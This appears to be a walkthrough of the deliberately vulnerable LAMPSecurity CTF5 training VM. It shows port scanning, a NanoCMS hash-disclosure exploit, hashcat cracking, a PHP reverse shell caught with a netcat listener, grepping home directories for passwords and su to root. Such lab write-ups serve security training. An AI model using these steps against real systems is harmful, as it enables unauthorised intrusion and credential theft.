Coffee Difficulty Rating:

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.

Author: madirish2600

Download: VulnHub via @VulnHub

Enumeration

Host Service Enumeration

nmap -v -p 1-65535 -sV -O -sT 192.168.30.130
Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Port Service Version Detection

TCP: 22

SSH

OpenSSH 4.7 (protocol 2.0)

TCP: 25

SMTP

Sendmail 8.14.1/8.14.1

TCP: 80

HTTPD

Apache httpd 2.2.6 ((Fedora))

TCP: 110

POP3

ipop3d 2006k.101

TCP: 111

rpcbind

N/A

TCP: 138

netbios-ssn

Samba smbd 3.X

TCP: 143

IMAP

University of Washington IMAP imapd

TCP: 445

netbios-ssn

Samba smbd 3.X (workgroup: MYGROUP)

TCP:901

HTTP

Samba SWAT administration server

TCP:3306

MySQL

MySQL 5.0.45

TCP:36644

RPC

RPC

TCP:36644

RPC

RPC

HTTP Enumeration

Inspection of the Web Application revealed the blog used a URL path of /~andy/, indicating it was serving an Apache home dir - username enumeration is possible. Further inspection of the web application indicated the use of GET requests /?page=contact,

Forced Browsing

Dirbuster revealed the directory /~andy/data/nanoadmin.php, indicating the site used NanoCMS (this was confirmed by viewing the page source code).

OWASP DirBuster

Web Application Enumeration

Viewing the web application disclosed the application used “NanoCMS”, this information was also previously discovered using Dirbuster. Research indicated a NanoCMS vulnerability existed that disclosed the applications password hashes. http://www.securityfocus.com/bid/34508/exploit

Hash Disclosure

Admin hases were successfully retrived using the discovered NanoCMS exploit:

NanoCMS Hash Expose Vuln

Verified Hash Type

Hash Identifier was used to confirm the hash was md5.

Hash Identifier

Hashcat md5 cracking

Hashcat was used to crack the hash.

# hashcat -m 0 -a 0 ctf5-hash.txt /usr/share/wordlists/rockyou.txt

Discovered password: 9d2f75377ac0ab991d40c91fd27e52fd:shannon

Web Application Exploitation

Authentication was successful using the previously cracked hash credential. I new page was created containing php reverse shell code:

NanoCMS PHP Reverse Shell

A netcat reverse handler was setup nc -n -v -l -p 443, the shell successfully connected back.

php reverse shell

Linux Local Enumeration

Enumeration indicated /home/ directories were readable.

Grep’ing for the string password discovered the following:

sh-3.2$ grep -R -i password /home/*

Discovered the file:

/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <title>Root
password</title>
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:  <text
xml:space="preserve"><note-content version="0.1">Root password
/home/patrick/.tomboy/481bca0d-7206-45dd-a459-a72ea1131329.note:Root password

The file contained the root credentials.

Username Password

root

50$cent

Local Privilege Escalation

sh-3.2$ su -
standard in must be a tty
sh-3.2$ python -c 'import pty;pty.spawn("/bin/sh")'
bash-3.2$ su -
su -
Password: 50$cent

[root@localhost ~]# whoami
whoami
root
[root@localhost ~]# id
id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
context=system_u:system_r:httpd_t:s0

Thanks for the VM :)